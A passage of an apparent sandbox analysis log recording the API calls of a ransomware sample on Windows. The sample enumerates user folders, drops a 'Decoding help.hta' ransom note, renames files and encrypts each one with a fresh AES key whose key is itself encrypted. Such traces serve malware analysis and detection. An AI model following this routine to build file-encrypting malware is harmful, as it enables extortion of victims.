HALPmcxz\\Documents\\OftyArbNR4uC28w.docx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oftyarbnr4uc28w.docx.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0052.060] CreateFileMappingA (hFile=0x6f0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x770 [0052.061] CryptAcquireContextA (in: phProv=0x580fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x580fcec*=0x3449e80) returned 1 [0054.921] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0x580fce8 | out: phKey=0x580fce8*=0x5d8550) returned 1 [0054.921] CryptExportKey (in: hKey=0x5d8550, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x580fbe4, pdwDataLen=0x580fce4 | out: pbData=0x580fbe4*, pdwDataLen=0x580fce4*=0x2c) returned 1 [0054.921] MapViewOfFile (hFileMappingObject=0x770, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x21a0) returned 0x2d0000 [0054.923] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x100) returned 1 [0054.924] CryptEncrypt (in: hKey=0x5d8550, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x580fce4*=0x21a0, dwBufLen=0x21a0 | out: pbData=0x2d0000*, pdwDataLen=0x580fce4*=0x21a0) returned 1 [0054.924] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0054.925] CloseHandle (hObject=0x770) returned 1 [0054.925] CryptDestroyKey (hKey=0x5d8550) returned 1 [0054.925] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0054.925] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.925] WriteFile (in: hFile=0x6f0, lpBuffer=0x580fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x580fbe4*, lpNumberOfBytesWritten=0x580fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.949] WriteFile (in: hFile=0x6f0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x580fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.949] CloseHandle (hObject=0x6f0) returned 1 [0056.949] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OftyArbNR4uC28w.docx.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.494] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd055300, ftCreationTime.dwHighDateTime=0x1d4d3ae, ftLastAccessTime.dwLowDateTime=0x3b008090, ftLastAccessTime.dwHighDateTime=0x1d4c829, ftLastWriteTime.dwLowDateTime=0x3b008090, ftLastWriteTime.dwHighDateTime=0x1d4c829, nFileSizeHigh=0x0, nFileSizeLow=0xb728, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oiY9Xm.ppt", cAlternateFileName="")) returned 1 [0058.494] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0058.494] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0058.494] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" [0058.494] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\decoding help.hta")) returned 0x1 [0058.494] lstrcmpiW (lpString1="Decoding help.hta", lpString2="oiY9Xm.ppt") returned -1 [0058.494] lstrlenW (lpString="oiY9Xm.ppt") returned 10 [0058.494] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0058.494] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0058.494] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="oiY9Xm.ppt" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oiY9Xm.ppt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oiY9Xm.ppt" [0058.494] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oiY9Xm.ppt" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oiY9Xm.ppt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oiY9Xm.ppt" [0058.494] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oiY9Xm.ppt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oiY9Xm.ppt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oiY9Xm.ppt.[ID]g9uZrLhJaygpwRm1[ID]" [0058.494] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oiY9Xm.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oiy9xm.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oiY9Xm.ppt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oiy9xm.ppt.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oiY9Xm.ppt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oiy9xm.ppt.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0058.495] CreateFileMappingA (hFile=0x6f0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x774 [0058.495] CryptAcquireContextA (in: phProv=0x580fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x580fcec*=0x2aac6aa0) returned 1 [0060.226] CryptGenKey (in: hProv=0x2aac6aa0, Algid=0x6610, dwFlags=0x1, phKey=0x580fce8 | out: phKey=0x580fce8*=0x5e2970) returned 1 [0060.226] CryptExportKey (in: hKey=0x5e2970, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x580fbe4, pdwDataLen=0x580fce4 | out: pbData=0x580fbe4*, pdwDataLen=0x580fce4*=0x2c) returned 1 [0060.226] MapViewOfFile (hFileMappingObject=0x774, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb720) Thread: id = 164 os_tid = 0x62c [0040.290] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Application Data\\*.*", lpFindFileData=0x5bcfd30 | out: lpFindFileData=0x5bcfd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 165 os_tid = 0x5a4 [0040.291] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*", lpFindFileData=0x594fd30 | out: lpFindFileData=0x594fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a59f0 [0040.291] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.291] FindNextFileW (in: hFindFile=0x5a59f0, lpFindFileData=0x594fd30 | out: lpFindFileData=0x594fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.291] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.291] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.291] FindNextFileW (in: hFindFile=0x5a59f0, lpFindFileData=0x594fd30 | out: lpFindFileData=0x594fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.292] lstrcpyW (in: lpString1=0x4248670, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*" [0040.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*") returned 47 [0040.292] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\Decoding help.hta" [0040.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\decoding help.hta")) returned 0xffffffff [0040.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0041.167] WriteFile (in: hFile=0x320, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x594fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x594fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.167] CloseHandle (hObject=0x320) returned 1 [0041.168] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.168] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0041.168] lstrlenW (lpString="desktop.ini") returned 11 [0041.168] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*" [0041.168] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*") returned 47 [0041.168] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" [0041.168] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" [0041.168] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0041.168] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0041.169] CreateFileMappingA (hFile=0x320, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3b0 [0041.169] CryptAcquireContextA (in: phProv=0x594fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x594fcec*=0x34491c0) returned 1 [0043.742] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0x594fce8 | out: phKey=0x594fce8*=0x5d8550) returned 1 [0043.743] CryptExportKey (in: hKey=0x5d8550, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x594fbe4, pdwDataLen=0x594fce4 | out: pbData=0x594fbe4*, pdwDataLen=0x594fce4*=0x2c) returned 1 [0043.743] MapViewOfFile (hFileMappingObject=0x3b0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100) returned 0x4410000 [0043.745] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x594fbe4*, pdwDataLen=0x594fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x594fbe4*, pdwDataLen=0x594fcf8*=0x100) returned 1 [0043.745] CryptEncrypt (in: hKey=0x5d8550, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4410000*, pdwDataLen=0x594fce4*=0x100, dwBufLen=0x100 | out: pbData=0x4410000*, pdwDataLen=0x594fce4*=0x100) returned 1 [0043.745] UnmapViewOfFile (lpBaseAddress=0x4410000) returned 1 [0043.746] CloseHandle (hObject=0x3b0) returned 1 [0043.746] CryptDestroyKey (hKey=0x5d8550) returned 1 [0043.746] CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0043.746] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.746] WriteFile (in: hFile=0x320, lpBuffer=0x594fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x594fcf8, lpOverlapped=0x0 | out: lpBuffer=0x594fbe4*, lpNumberOfBytesWritten=0x594fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.747] WriteFile (in: hFile=0x320, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x594fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x594fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.747] CloseHandle (hObject=0x320) returned 1 [0043.748] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.749] FindNextFileW (in: hFindFile=0x5a59f0, lpFindFileData=0x594fd30 | out: lpFindFileData=0x594fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0043.749] FindClose (in: hFindFile=0x5a59f0 | out: hFindFile=0x5a59f0) returned 1 Thread: id = 166 os_tid = 0x780 [0040.292] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\*.*", lpFindFileData=0xd30fd30 | out: lpFindFileData=0xd30fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1ae930, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1ae930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5a30 [0040.293] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.293] FindNextFileW (in: hFindFile=0x5a5a30, lpFindFileData=0xd30fd30 | out: lpFindFileData=0xd30fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1ae930, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1ae930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.293] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.293] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.293] FindNextFileW (in: hFindFile=0x5a5a30, lpFindFileData=0xd30fd30 | out: lpFindFileData=0xd30fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f15bdb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f15bdb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10", cAlternateFileName="")) returned 1 [0040.293] lstrcmpW (lpString1=".", lpString2="10") returned -1 [0040.293] lstrcmpW (lpString1="..", lpString2="10") returned -1 [0040.293] lstrcmpiW (lpString1="windows", lpString2="10") returned 1 [0040.293] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\*.*" [0040.293] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\*.*") returned 67 [0040.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\", lpString2="10" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10" [0040.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*" [0040.293] GlobalMemoryStatus (in: lpBuffer=0xd30fd10 | out: lpBuffer=0xd30fd10) [0040.293] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4298800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x268 [0040.294] CloseHandle (hObject=0x268) returned 1 [0040.294] FindNextFileW (in: hFindFile=0x5a5a30, lpFindFileData=0xd30fd30 | out: lpFindFileData=0xd30fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f15bdb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f15bdb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10", cAlternateFileName="")) returned 0 [0040.294] FindClose (in: hFindFile=0x5a5a30 | out: hFindFile=0x5a5a30) returned 1 Thread: id = 167 os_tid = 0x590 [0040.295] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Desktop\\*.*", lpFindFileData=0xd44fd30 | out: lpFindFileData=0xd44fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 168 os_tid = 0x248 [0040.296] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*", lpFindFileData=0xd58fd30 | out: lpFindFileData=0xd58fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5a30 [0040.296] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.297] FindNextFileW (in: hFindFile=0x5a5a30, lpFindFileData=0xd58fd30 | out: lpFindFileData=0xd58fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.297] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.297] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.297] FindNextFileW (in: hFindFile=0x5a5a30, lpFindFileData=0xd58fd30 | out: lpFindFileData=0xd58fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.297] lstrcpyW (in: lpString1=0x41d84c0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" [0040.297] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned 47 [0040.297] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Decoding help.hta" [0040.297] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\decoding help.hta")) returned 0xffffffff [0040.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0041.478] WriteFile (in: hFile=0x310, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xd58fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, 